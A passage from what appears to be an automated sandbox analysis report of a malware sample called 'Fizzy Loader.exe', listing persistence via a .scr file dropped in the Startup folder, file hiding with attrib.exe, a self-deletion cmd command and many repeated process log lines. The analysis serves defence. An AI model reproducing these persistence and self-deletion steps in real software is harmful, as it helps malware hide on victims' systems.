                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848FE2316 push 8B485F94h; iretd 6_2_00007FF848FE231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF848F400BD pushad ; iretd 9_2_00007FF848F400C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F300BD pushad ; iretd 11_2_00007FF848F300C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F36387 push esp; retf 11_2_00007FF848F36388
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF8490007A8 pushad ; iretd 11_2_00007FF849000836
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF848F300BD pushad ; iretd 14_2_00007FF848F300C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FF848F200BD pushad ; iretd 22_2_00007FF848F200C1

                        Persistence and Installation Behavior

                        barindex
                        Drops PE files with a suspicious file extension
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scrJump to dropped file
                        Uses attrib.exe to hide files
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\Fizzy Loader.exe"
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scrJump to dropped file
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scrJump to dropped file

                        Boot Survival

                        barindex
                        Drops PE files to the startup folder
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scrJump to dropped file
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ukUGV.scrJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ukUGV.scrJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr\:Zone.Identifier:$DATAJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Self deletion via cmd or bat file
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\Fizzy Loader.exe" && pause
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\Fizzy Loader.exe" && pauseJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Fizzy Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
